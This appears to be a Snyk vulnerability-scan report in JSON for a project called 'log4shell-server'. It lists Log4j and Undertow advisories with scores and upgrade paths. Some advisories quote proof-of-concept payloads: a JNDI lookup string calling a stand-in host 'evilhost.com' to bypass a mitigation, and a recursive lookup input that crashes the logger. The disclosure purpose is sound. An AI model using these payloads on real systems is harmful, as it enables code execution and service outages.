+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n",
+ "epssDetails": {
+ "percentile": "0.21908",
+ "probability": "0.00053",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-7885"
+ ],
+ "CWE": [
+ "CWE-362"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-08-18T13:26:45.492443Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-08-07T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-08-18T13:44:23.906447Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-24T01:12:26.277956Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014",
+ "title": "Remote Code Execution (RCE)",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta9,2.3.1)",
+ "[2.4,2.12.2)",
+ "[2.13.0,2.16.0)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "2.3.1",
+ "2.12.2",
+ "2.16.0"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f",
+ "title": "Apache Pony Mail"
+ },
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security Page"
+ },
+ {
+ "url": "https://twitter.com/marcioalm/status/1471740771581652995",
+ "title": "Twitter Post"
+ },
+ {
+ "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml",
+ "title": "Nuclei Templates"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9,
+ "modificationTime": "2024-03-11T09:51:51.455756Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 8.1,
+ "modificationTime": "2024-03-11T09:53:56.296034Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T13:59:32.295395Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:51:51.455756Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 8.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:56.296034Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. 
If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99901",
+ "probability": "0.97307",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-45046"
+ ],
+ "CWE": [
+ "CWE-94"
+ ],
+ "GHSA": [
+ "GHSA-7rjr-3q55-vv33"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-14T18:28:31.339218Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-14T18:01:28Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "Nuclei Templates",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-14T18:44:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:25.837600Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.16.0"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524",
+ "title": "Denial of Service (DoS)",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+ "credit": [
+ "Hideki Okamoto of Akamai Technologies"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta9,2.3.1)",
+ "[2.4,2.12.3)",
+ "[2.13.0,2.17.0)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "2.3.1",
+ "2.12.3",
+ "2.17.0"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "high",
+ "cvssScore": 7.5,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/LOG4J2-3230",
+ "title": "JIRA Issue"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 5.9,
+ "modificationTime": "2024-03-11T09:51:51.570474Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 5.9,
+ "modificationTime": "2024-03-11T09:53:58.516498Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
+ "assigner": "Snyk",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T13:59:38.288854Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "medium",
+ "baseScore": 5.9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:51:51.570474Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.9,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:58.516498Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n",
+ "epssDetails": {
+ "percentile": "0.99523",
+ "probability": "0.95998",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-45105"
+ ],
+ "CWE": [
+ "CWE-400"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-17T18:23:58.542986Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-17T18:20:21Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-18T07:05:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:53:58.516498Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "high",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.17.0"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ },
+ {
+ "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
+ "title": "Arbitrary Code Execution",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[2.0-beta7,2.3.2)",
+ "[2.4,2.12.4)",
+ "[2.13.0,2.17.1)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "2.3.2",
+ "2.12.4",
+ "2.17.1"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.6,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "org.apache.logging.log4j:log4j-core",
+ "references": [
+ {
+ "url": "https://logging.apache.org/log4j/2.x/security.html",
+ "title": "Apache Security Page"
+ },
+ {
+ "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/LOG4J2-3293",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1",
+ "title": "Openwall Mail"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 6.6,
+ "modificationTime": "2024-03-11T09:48:51.766965Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 6.6,
+ "modificationTime": "2024-03-11T09:53:58.472982Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:04:47.220633Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:48:51.766965Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 6.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:53:58.472982Z"
+ }
+ ],
+ "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n",
+ "epssDetails": {
+ "percentile": "0.89722",
+ "probability": "0.02239",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2021-44832"
+ ],
+ "CWE": [
+ "CWE-94"
+ ]
+ },
+ "packageName": "org.apache.logging.log4j:log4j-core",
+ "proprietary": false,
+ "creationTime": "2021-12-28T19:42:55.818691Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2021-12-28T19:42:53Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "org.apache.logging.log4j",
+ "artifactId": "log4j-core"
+ },
+ "publicationTime": "2021-12-28T20:17:52Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:53:58.472982Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "org.apache.logging.log4j:log4j-core@2.15.0"
+ ],
+ "upgradePath": [
+ false,
+ "org.apache.logging.log4j:log4j-core@2.17.1"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "org.apache.logging.log4j:log4j-core",
+ "version": "2.15.0"
+ }
+ ],
+ "ok": false,
+ "dependencyCount": 13,
+ "org": "austin.doll",
+ "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n",
+ "isPrivate": true,
+ "licensesPolicy": {
+ "severities": {},
+ "orgLicenseRules": {
+ "AGPL-1.0": {
+ "licenseType": "AGPL-1.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "AGPL-3.0": {
+ "licenseType": "AGPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "Artistic-1.0": {
+ "licenseType": "Artistic-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "Artistic-2.0": {
+ "licenseType": "Artistic-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CDDL-1.0": {
+ "licenseType": "CDDL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "CPOL-1.02": {
+ "licenseType": "CPOL-1.02",
+ "severity": "high",
+ "instructions": ""
+ },
+ "EPL-1.0": {
+ "licenseType": "EPL-1.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "GPL-2.0": {
+ "licenseType": "GPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "GPL-3.0": {
+ "licenseType": "GPL-3.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.0": {
+ "licenseType": "LGPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-3.0": {
+ "licenseType": "LGPL-3.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-1.1": {
+ "licenseType": "MPL-1.1",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MPL-2.0": {
+ "licenseType": "MPL-2.0",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "MS-RL": {
+ "licenseType": "MS-RL",
+ "severity": "medium",
+ "instructions": ""
+ },
+ "SimPL-2.0": {
+ "licenseType": "SimPL-2.0",
+ "severity": "high",
+ "instructions": ""
+ },
+ "LGPL-2.1": {
+ "licenseType": "LGPL-2.1",
+ "severity": "medium",
+ "instructions": ""
+ }
+ }
+ },
+ "packageManager": "maven",
+ "ignoreSettings": {
+ "adminOnly": false,
+ "reasonRequired": true,
+ "disregardFilesystemIgnores": false
+ },
+ "summary": "9 vulnerable dependency paths",
+ "remediation": {
+ "unresolved": [
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "cvssV3BaseScore": 5.3,
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 2.3,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "low",
+ "baseScore": 3.1,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-07-10T14:39:24.891744Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
+ "assigner": "Red Hat",
+ "severity": "medium",
+ "baseScore": 5.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-09T13:34:05.805132Z"
+ }
+ ],
+ "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n",
+ "epssDetails": {
+ "percentile": "0.10901",
+ "probability": "0.00044",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2024-3653"
+ ],
+ "CWE": [
+ "CWE-401"
+ ],
+ "GHSA": [
+ "GHSA-ch7q-gpff-h9hp"
+ ]
+ },
+ "packageName": "io.undertow:undertow-core",
+ "proprietary": false,
+ "creationTime": "2024-07-10T07:43:42.505449Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2024-07-09T00:31:40Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "io.undertow",
+ "artifactId": "undertow-core"
+ },
+ "publicationTime": "2024-07-10T14:39:24.891304Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-08-09T13:34:05.805132Z",
+ "socialTrendAlert": false,
+ "packagePopularityRank": 99,
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "io.undertow:undertow-core@2.3.14.Final"
+ ],
+ "upgradePath": [],
+ "isUpgradable": false,
+ "isPatchable": false,
+ "isPinnable": false,
+ "isRuntime": false,
+ "name": "io.undertow:undertow-core",
+ "version": "2.3.14.Final",
+ "severityWithCritical": "low"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7707751",
+ "title": "Race Condition",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 6.9,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305290",
+ "title": "Red Hat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "cvssV3BaseScore": 7.5,
+ "modificationTime": "2024-08-24T01:12:26.277956Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.9,
+ "cvssVersion": "4.0",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 6.5,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-08-18T13:48:54.310148Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.5,
+ "cvssVersion": "3.1",
